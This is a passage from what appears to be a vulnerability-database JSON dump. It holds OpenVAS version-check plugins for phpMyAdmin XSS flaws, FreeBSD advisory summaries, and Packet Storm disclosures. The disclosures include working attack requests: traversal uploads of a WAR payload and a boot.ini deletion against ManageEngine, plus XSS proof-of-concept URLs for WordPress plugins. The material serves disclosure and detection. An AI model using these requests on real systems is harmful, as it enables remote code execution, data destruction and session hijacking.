! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( vers =~ \"^4\\.1\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.1.14.2\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.1.14.2\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nif( vers =~ \"^4\\.2\\.\" ) {\n if( version_is_less( version:vers, test_version:\"4.2.6\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"4.2.6\" );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:26", "description": "phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.", "cvss3": {}, "published": "2017-08-21T00:00:00", "type": "openvas", "title": "phpMyAdmin Multiple XSS Vulnerabilities - 2 - June14 (Linux))", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4349"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310112011", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112011", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_mult_xss_vuln02_jun14_lin.nasl 11863 2018-10-12 09:42:02Z mmartin $\n#\n# phpMyAdmin Multiple XSS Vulnerabilities - 2 - June14 (Linux)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112011\");\n script_version(\"$Revision: 11863 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 11:42:02 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 10:07:21 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2014-4349\");\n script_bugtraq_id(68205);\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"phpMyAdmin Multiple XSS Vulnerabilities - 2 - June14 (Linux))\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks the banner.\");\n\n script_tag(name:\"insight\", value:\"Multiple XSS vulnerabilities allow remote authenticated users to inject arbitrary web script\n or HTML via a crafted table name that is improperly handled after a (1) hide or (2) unhide action.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin versions 4.1.x prior to 4.1.14.1 and 4.2.x prior to 4.2.4.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.1.14.1 or 4.2.4.\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-3/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version =~ \"^4\\.1\\.\") {\n if (version_is_less(version: version, test_version: \"4.1.14.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.1.14.1\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^4\\.2\\.\") {\n if (version_is_less(version: version, test_version: \"4.2.4\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.2.4\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(0);\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:22", "description": "phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.", "cvss3": {}, "published": "2017-08-21T00:00:00", "type": "openvas", "title": "phpMyAdmin Multiple XSS Vulnerabilities - 2 - June14 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4349"], "modified": "2018-09-19T00:00:00", "id": "OPENVAS:1361412562310112010", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310112010", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_phpmyadmin_mult_xss_vuln02_jun14_win.nasl 11474 2018-09-19 11:38:50Z mmartin $\n#\n# phpMyAdmin Multiple XSS Vulnerabilities - 2 - June14 (Windows)\n#\n# Authors:\n# Adrian Steins <adrian.steins@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.112010\");\n script_version(\"$Revision: 11474 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-19 13:38:50 +0200 (Wed, 19 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-21 10:07:21 +0200 (Mon, 21 Aug 2017)\");\n script_tag(name:\"cvss_base\", value:\"3.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2014-4349\");\n script_bugtraq_id(68205);\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"phpMyAdmin Multiple XSS Vulnerabilities - 2 - June14 (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"phpMyAdmin/installed\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to multiple cross-site scripting vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks the banner.\");\n\n script_tag(name:\"insight\", value:\"Multiple XSS vulnerabilities allow remote authenticated users to inject arbitrary web script\n or HTML via a crafted table name that is improperly handled after a (1) hide or (2) unhide action.\");\n\n script_tag(name:\"affected\", value:\"phpMyAdmin versions 4.1.x prior to 4.1.14.1 and 4.2.x prior to 4.2.4.\");\n\n script_tag(name:\"solution\", value:\"Update to version 4.1.14.1 or 4.2.4.\");\n\n script_xref(name:\"URL\", value:\"https://www.phpmyadmin.net/security/PMASA-2014-3/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version =~ \"^4\\.1\\.\") {\n if (version_is_less(version: version, test_version: \"4.1.14.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.1.14.1\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nif (version =~ \"^4\\.2\\.\") {\n if (version_is_less(version: version, test_version: \"4.2.4\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"4.2.4\");\n security_message(port: port, data: report);\n exit(0);\n }\n}\n\nexit(0);\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nThe phpMyAdmin development team reports:\n\nSelf-XSS due to unescaped HTML output in database\n\t structure page.\nWith a crafted table comment, it is possible to trigger\n\t an XSS in database structure page.\n\n\nSelf-XSS due to unescaped HTML output in database\n\t triggers page.\nWhen navigating into the database triggers page, it is\n\t possible to trigger an XSS with a crafted trigger\n\t name.\n\n\nMultiple XSS in AJAX confirmation messages.\nWith a crafted column name it is possible to trigger an\n\t XSS when dropping the column in table structure page. With\n\t a crafted table name it is possible to trigger an XSS when\n\t dropping or truncating the table in table operations\n\t page.\n\n\nAccess for an unprivileged user to MySQL user list.\nAn unpriviledged user could view the MySQL user list and\n\t manipulate the tabs displayed in phpMyAdmin for them.\n\n\n", "cvss3": {}, "published": "2014-07-18T00:00:00", "type": "freebsd", "title": "phpMyAdmin -- multiple XSS vulnerabilities, missing validation", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4954", "CVE-2014-4955", "CVE-2014-4986", "CVE-2014-4987"], "modified": "2014-07-20T00:00:00", "id": "3F09CA29-0E48-11E4-B17A-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/3f09ca29-0e48-11e4-b17a-6805ca0b3d42.html", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nThe phpMyAdmin development team reports:\n\nMultiple XSS vulnerabilities in browse table, ENUM\n\t editor, monitor, query charts and table relations pages.\n With a crafted database, table or a primary/unique key\n\t column name it is possible to trigger an XSS when dropping\n\t a row from the table. With a crafted column name it is\n\t possible to trigger an XSS in the ENUM editor dialog. With\n\t a crafted variable name or a crafted value for unit field\n\t it is possible to trigger a self-XSS when adding a new\n\t chart in the monitor page. With a crafted value for x-axis\n\t label it is possible to trigger a self-XSS in the query\n\t chart page. With a crafted relation name it is possible to\n\t trigger an XSS in table relations page.\n\n\nXSS in view operations page.\nWith a crafted view name it is possible to trigger an\n\t XSS when dropping the view in view operation page.\n\n\n", "cvss3": {}, "published": "2014-08-17T00:00:00", "type": "freebsd", "title": "phpMyAdmin -- XSS vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2014-08-17T00:00:00", "id": "FBB01289-2645-11E4-BC44-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/fbb01289-2645-11e4-bc44-6805ca0b3d42.html", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nThe phpMyAdmin development team reports:\n\nSelf-XSS due to unescaped HTML output in recent/favorite\n\t tables navigation.\nWhen marking a crafted database or table name as\n\t favorite or having it in recent tables, it is possible to\n\t trigger an XSS.\nThis vulnerability can be triggered only by someone who\n\t logged in to phpMyAdmin, as the usual token protection\n\t prevents non-logged-in users from accessing the required\n\t form.\n\n\nSelf-XSS due to unescaped HTML output in navigation items\n\t hiding feature.\nWhen hiding or unhiding a crafted table name in the\n\t navigation, it is possible to trigger an XSS.\nThis vulnerability can be triggered only by someone who\n\t logged in to phpMyAdmin, as the usual token protection\n\t prevents non-logged-in users from accessing the required\n\t form.\n\n\n", "cvss3": {}, "published": "2014-06-20T00:00:00", "type": "freebsd", "title": "phpMyAdmin -- two XSS vulnerabilities due to unescaped db/table names", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4348", "CVE-2014-4349"], "modified": "2014-06-24T00:00:00", "id": "C4892644-F8C6-11E3-9F45-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/c4892644-f8c6-11e3-9f45-6805ca0b3d42.html", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nThe phpMyAdmin development team reports:\n\nXSRF/CSRF due to DOM based XSS in the micro history feature.\nBy deceiving a logged-in user to click on a crafted URL,\n\t it is possible to perform remote code execution and in some\n\t cases, create a root account due to a DOM based XSS\n\t vulnerability in the micro history feature.\n\n\n", "cvss3": {}, "published": "2014-09-13T00:00:00", "type": "freebsd", "title": "phpMyAdmin -- XSRF/CSRF due to DOM based XSS in the micro history feature", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6300"], "modified": "2014-09-13T00:00:00", "id": "CC627E6C-3B89-11E4-B629-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/cc627e6c-3b89-11e4-b629-6805ca0b3d42.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nThe phpMyAdmin development team reports:\n\nWith a crafted ENUM value it is possible to trigger an\n\t XSS in table search and table structure pages. This\n\t vulnerability can be triggered only by someone who is\n\t logged in to phpMyAdmin, as the usual token protection\n\t prevents non-logged-in users from accessing the required\n\t pages.\n\n\n", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "freebsd", "title": "phpMyAdmin -- XSS vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7217"], "modified": "2014-10-01T00:00:00", "id": "3E8B7F8A-49B0-11E4-B711-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/3e8b7f8a-49b0-11e4-b711-6805ca0b3d42.html", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:53", "description": "", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "packetstorm", "title": "ManageEngine Code Execution / File Deletion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6035", "CVE-2014-6034", "CVE-2014-6036"], "modified": "2014-09-29T00:00:00", "id": "PACKETSTORM:128474", "href": "https://packetstormsecurity.com/files/128474/ManageEngine-Code-Execution-File-Deletion.html", "sourceData": "`Hi, \n \nThis is the fifth part of the ManageOwnage series. For previous parts, see: \nhttp://seclists.org/fulldisclosure/2014/Aug/55 \nhttp://seclists.org/fulldisclosure/2014/Aug/75 \nhttp://seclists.org/fulldisclosure/2014/Aug/88 \nhttp://seclists.org/fulldisclosure/2014/Sep/1 \n \nThis time we have a file upload with directory traversal as well as an \narbitrary file deletion vulnerability. The file upload can be abused \nto deliver a WAR payload in the Tomcat webapps directory, which will \ndeploy a malicious Servlet allowing the attacker to execute arbitrary \ncode. \n \nDetails are below, and the usual Metasploit module has been submitted \nand should be available soon (see pull request \nhttps://github.com/rapid7/metasploit-framework/pull/3903). \n \n \n>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360 \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n========================================================================== \n \n>> Background on the affected products: \n\"ManageEngine OpManager is a network and data center infrastructure \nmanagement software that helps large enterprises, service providers \nand SMEs manage their data centers and IT infrastructure efficiently \nand cost effectively. Automated workflows, intelligent alerting \nengines, configurable discovery rules, and extendable templates enable \nIT teams to setup a 24x7 monitoring system within hours of \ninstallation.\" \n \n\"Social IT Plus offers a cascading wall that helps IT folks to start \ndiscussions, share articles and videos easily and quickly. Other team \nmembers can access it and post comments and likes on the fly.\" \n \n\"Managing mission critical business applications is now made easy \nthrough ManageEngine IT360. With agentless monitoring methodology, \nmonitor your applications, servers and databases with ease. Agentless \nmonitoring of your business applications enables you high ROI and low \nTOC. With integrated network monitoring and bandwidth utilization, \nquickly troubleshoot any performance related issue with your network \nand assign issues automatically with ITIL based ServiceDesk \nintegration.\" \n \n \n>> Technical details: \n#1 \nVulnerability: Remote code execution via WAR file upload \nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360 \n \na) \nCVE-2014-6034 \nPOST /servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../tomcat/webapps&FILENAME=payload.war \nAffected versions: OpManager v8.8 to v11.3; Social IT Plus v11.0; \nIT360 v? to v10.4 \nA Metasploit module that exploits this vulnerability has been released. \n \nb) \nCVE-2014-6035 \nPOST /servlets/FileCollector?AGENTKEY=123&FILENAME=../../../tomcat/webapps/warfile.war \nAffected versions: OpManager v? to v11.3 \n \n \n#2 \nVulnerability: Arbitrary file deletion \nCVE-2014-6036 \nConstraints: unauthenticated on OpManager and Social IT; authenticated in IT360 \nAffected versions: OpManager v? to v11.3; Social IT Plus v11.0; IT360 \nv? to v10.4 \n \nPOST /servlets/multipartRequest?customIcon=delete&fileName=../../../../boot.ini \n \n \n>> Fix: \nUpgrade to OpManager 11.3, then install the patch in \nhttps://support.zoho.com/portal/manageengine/helpcenter/articles/servlet-vulnerability-fix \nThis patch can be applied to all the applications but only for the \nlatest version of each (OpManager 11.3, Social IT 11.0, IT360 10.4). \nManageEngine have indicated that the soon to be released OpManager \nversion 11.4 might not have the fix as the release is almost ready. \nThey are planning to include the fix in OpManager version 11.5 which \nshould be released sometime in late November or December 2014. No \nindication was given for when fixed versions of IT360 and Social IT \nPlus will be released. \n \nA copy of the advisory above can be found at my repo: \nhttps://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt \n \nRegards, \nPedro \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128474/meopmanager-execlfi.txt", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-12-05T22:18:53", "description": "", "published": "2014-10-10T00:00:00", "type": "packetstorm", "title": "WordPress Google Calendar Events 2.0.1 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-7138"], "modified": "2014-10-10T00:00:00", "id": "PACKETSTORM:128626", "href": "https://packetstormsecurity.com/files/128626/WordPress-Google-Calendar-Events-2.0.1-Cross-Site-Scripting.html", "sourceData": "`Advisory ID: HTB23235 \nProduct: Google Calendar Events WordPress plugin \nVendor: Phil Derksen \nVulnerable Version(s): 2.0.1 and probably prior \nTested Version: 2.0.1 \nAdvisory Publication: September 17, 2014 [without technical details] \nVendor Notification: September 17, 2014 \nVendor Patch: October 7, 2014 \nPublic Disclosure: October 8, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-7138 \nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in Google Calendar Events WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin. \n \n \n1) Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin: CVE-2014-7138 \n \nInput passed via the \"gce_feed_ids\" HTTP GET parameter to \"/wp-admin/admin-ajax.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://wordpress/wp-admin/admin-ajax.php?action=gce_ajax&gce_type=page&gce_feed_ids=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to Google Calendar Events 2.0.4 \n \nMore Information: \nhttps://github.com/pderksen/WP-Google-Calendar-Events/commit/df1fe1d71f8ce9496cc601c96839c474e49db91d \nhttps://github.com/pderksen/WP-Google-Calendar-Events/commit/a701ceeb410bdda9d96c9d3d12104630df5d5b43 \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23235 - https://www.htbridge.com/advisory/HTB23235 - Reflected Cross-Site Scripting (XSS) in Google Calendar Events WordPress Plugin. \n[2] Google Calendar Events WordPress plugin - http://philderksen.com/ - Parses Google Calendar feeds and displays the events as a calendar grid or list on a page, post or widget. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128626/wpgce-xss.txt"}, {"lastseen": "2016-12-05T22:19:36", "description": "", "cvss3": {}, "published": "2014-10-10T00:00:00", "type": "packetstorm", "title": "WordPress Contact Form DB 2.8.13 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-7139"], "modified": "2014-10-10T00:00:00", "id": "PACKETSTORM:128625", "href": "https://packetstormsecurity.com/files/128625/WordPress-Contact-Form-DB-2.8.13-Cross-Site-Scripting.html", "sourceData": "`Advisory ID: HTB23233 \nProduct: Contact Form DB WordPress plugin \nVendor: Michael Simpson \nVulnerable Version(s): 2.8.13 and probably prior \nTested Version: 2.8.13 \nAdvisory Publication: September 17, 2014 [without technical details] \nVendor Notification: September 17, 2014 \nVendor Patch: September 25, 2014 \nPublic Disclosure: October 8, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-7139 \nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Contact Form DB WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin installed. \n \n1) Two Cross-Site Scripting (XSS) Vulnerabilities in Contact Form DB WordPress Plugin: CVE-2014-7139 \n \n1.1 Input passed via the \"form\" HTTP GET parameter to \"/wp-admin/admin.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&form=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n1.2 Input passed via the \"enc\" HTTP GET parameter to \"/wp-admin/admin.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&enc=%27%22%29;%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to Contact Form DB 2.8.16. \n \nMore Information: \nhttps://wordpress.org/plugins/contact-form-7-to-database-extension/changelog/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23233 - https://www.htbridge.com/advisory/HTB23233 - Tow XSS in Contact Form DB WordPress Plugin. \n[2] Contact Form DB WordPress plugin - http://wordpress.org/plugins/contact-form-7-to-database-extension/ - Save form submissions to the database from Contact Form 7, Fast Secure Contact Form, JetPack Contact Form and Gravity Forms. Includes exports and short codes. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128625/wpcontactformdb-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-12-05T22:15:29", "description": "", "cvss3": {}, "published": "2014-10-01T00:00:00", "type": "packetstorm", "title": "WordPress Photo Gallery 1.1.30 Cross Site Scripting", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6315"], "modified": "2014-10-01T00:00:00", "id": "PACKETSTORM:128518", "href": "https://packetstormsecurity.com/files/128518/WordPress-Photo-Gallery-1.1.30-Cross-Site-Scripting.html", "sourceData": "`Advisory ID: HTB23232 \nProduct: Photo Gallery WordPress plugin \nVendor: http://web-dorado.com/ \nVulnerable Version(s): 1.1.30 and probably prior \nTested Version: 1.1.30 \nAdvisory Publication: September 10, 2014 [without technical details] \nVendor Notification: September 10, 2014 \nVendor Patch: September 10, 2014 \nPublic Disclosure: October 1, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-6315 \nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered three vulnerabilities in Photo Gallery WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Cross-Site Scripting 